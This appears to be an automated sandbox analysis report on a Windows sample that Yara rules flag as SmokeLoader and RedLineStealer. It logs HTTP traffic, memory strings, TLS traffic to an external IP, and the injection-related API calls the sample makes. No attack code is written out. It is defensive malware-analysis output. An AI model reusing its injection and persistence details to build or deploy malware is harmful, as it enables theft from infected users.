HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:11:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000002.00000000.2125963281.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125963281.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.2122001915.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125963281.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125963281.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125963281.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2125963281.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2125269917.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2125238364.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2124617675.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.2130431930.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2123955019.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2125963281.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2123955019.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2122929961.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.2130431930.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000002.00000000.2125963281.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2125963281.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443

Source: unknown

HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:50001 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,NtEnumerateKey,	0_2_00403277
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401514
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	4_2_00402F97
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401542
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,	4_2_00403247
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401549
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,	4_2_0040324F
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,	4_2_00403256
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401557
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,	4_2_0040326C
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA,	4_2_00403277
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014FE
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,	4_2_00403290

